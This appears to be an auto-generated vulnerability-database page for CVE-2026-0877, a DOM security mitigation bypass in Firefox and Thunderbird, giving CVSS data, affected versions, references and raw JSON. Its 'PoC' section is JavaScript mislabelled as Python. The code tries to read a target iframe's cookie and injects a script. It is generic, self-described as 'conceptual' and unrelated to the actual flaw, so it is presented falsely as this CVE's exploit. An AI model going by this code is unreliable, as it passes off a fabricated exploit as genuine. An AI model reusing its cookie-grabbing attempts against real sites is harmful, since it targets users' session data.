Security Vulnerability Report
中文
CVE-2026-0877 CVSS 8.1 HIGH

CVE-2026-0877

Published: 2026-01-13 14:16:38
Last Modified: 2026-04-13 15:17:16
Source: [email protected]

Description

Mitigation bypass in the DOM: Security component. This vulnerability was fixed in Firefox 147, Firefox ESR 115.32, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE
Mozilla Firefox < 147
Mozilla Firefox ESR 115.x < 115.32
Mozilla Firefox ESR 140.x < 140.7
Mozilla Thunderbird < 147
Mozilla Thunderbird < 140.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-0877 PoC - DOM Security Component Bypass // Note: This is a conceptual PoC for educational purposes only // 构造恶意DOM操作以触发安全组件绕过 function triggerDOMBypass() { // 创建恶意iframe尝试跨域访问 const maliciousIframe = document.createElement('iframe'); maliciousIframe.src = 'https://target-site.com'; document.body.appendChild(maliciousIframe); // 利用DOM操作时序问题 setTimeout(() => { try { // 尝试在安全检查前访问敏感DOM内容 const sensitiveData = maliciousIframe.contentDocument.cookie; console.log('Bypassed security check, extracted:', sensitiveData); } catch (e) { console.log('Security check triggered'); } }, 0); // 利用特定事件序列 document.addEventListener('DOMContentLoaded', () => { // 构造特定的事件处理序列 const element = document.createElement('div'); element.onclick = () => { // 尝试绕过安全限制 performBypassAttempt(); }; document.body.appendChild(element); }); } function performBypassAttempt() { // 构造恶意脚本尝试访问受限DOM const script = document.createElement('script'); script.textContent = ` // 尝试利用DOM属性访问 try { const data = window.name; // 进一步利用 } catch (err) { // Handle error } `; document.head.appendChild(script); } // 触发漏洞利用 window.addEventListener('load', triggerDOMBypass); // 防御检测代码 if (typeof browser !== 'undefined' && browser.runtime) { console.log('Firefox detected, checking version...'); }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0877", "sourceIdentifier": "[email protected]", "published": "2026-01-13T14:16:38.270", "lastModified": "2026-04-13T15:17:15.810", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mitigation bypass in the DOM: Security component. This vulnerability was fixed in Firefox 147, Firefox ESR 115.32, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7."}, {"lang": "es", "value": "Elusión de mitigación en el DOM: Componente de seguridad. Esta vulnerabilidad afecta a Firefox &lt; 147, Firefox ESR &lt; 115.32, Firefox ESR &lt; 140.7, Thunderbird &lt; 147 y Thunderbird &lt; 140.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.32.0", "matchCriteriaId": "D7C58C67-2B8D-493D-8914-F407E35B348A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "147.0", "matchCriteriaId": "E06AF540-011D-4249-9815-3A4609DD26D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "128.0", "versionEndExcluding": "140.7.0", "matchCriteriaId": "4FF5535D-A7D8-46C6-AA5A-8EB3762A9171"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.7.0", "matchCriteriaId": "BFBAB968-3244-4970-8D02-CCF9D5FB958D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "147.0", "matchCriteriaId": "47B67C0A-B05F-4212-9255-0446302237A5"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1999257", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-01/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-02/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-03/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-04/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-05/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.